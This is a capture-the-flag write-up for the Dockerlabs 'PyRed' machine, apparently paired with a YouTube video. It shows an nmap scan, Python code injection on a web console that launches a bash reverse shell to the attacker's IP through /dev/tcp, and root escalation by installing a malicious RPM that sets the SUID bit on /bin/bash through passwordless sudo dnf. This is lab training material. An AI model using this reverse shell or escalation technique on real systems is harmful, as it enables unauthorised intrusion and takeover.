Writeup PyRed from Dockerlabs

You have two options: READ or WATCH me on YouTube how I complete this CTF Machine.

Do not press the Subscribe Button, It's ILLEGAL 😁😆😅😂🤣

Let's start our reconnaissance with a quick nmap scan:

nmap -p- --open -sV -sC -sS --min-rate=5000 -n -Pn 172.17.0.2 -oN Nmap1

-p- - Search for ports

--open - List open ports

-sS - A quick scan mode

-sC - Use a set of reconnaissance scripts

-sV - Find the version of the open service

--min-rate=5000 - Makes the reconnaissance even faster by sending no fewer than 5000 packets

-n - No DNS resolution

-Pn - No ping

-oN - Save file name

Port 5000 is open:

We explored the web interface available on port 5000.

The page allowed Python code injection, so we exploited this to get a reverse shell by executing the following code from the web console:

import os
os.system("bin/bash -i >& /dev/tcp/your_ip_address/your_port 0>&1")

Be sure to replace "your_ip_address" and "your_port" with your actual IP address and port number.

We ran sudo -l to check the current user's permissions.

We observed that the user could execute dnf as a superuser without a password.

To exploit this privilege, we created a malicious RPM package on our attacking machine to modify the permissions of /bin/bash by setting the SUID bit.

TF=$(mktemp -d)
echo 'chmod u+s /bin/bash' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

• set up a simple HTTP server to share the .rpm file.

    python3 -m http.server 8000
  

  On the target machine, I use curl to download the malicious RPM file.

  

• Install the RPM Using dnf:

    sudo -u root /usr/bin/dnf install -y paq.rpm
  

  

  After installing the RPM, /bin/bash will have the SUID bit set. I can now gain root access by running:

bash -p

And we are root

Thank you so much for reading this. Please don't forget to check out my YouTube channel and subscribe. Thank you all!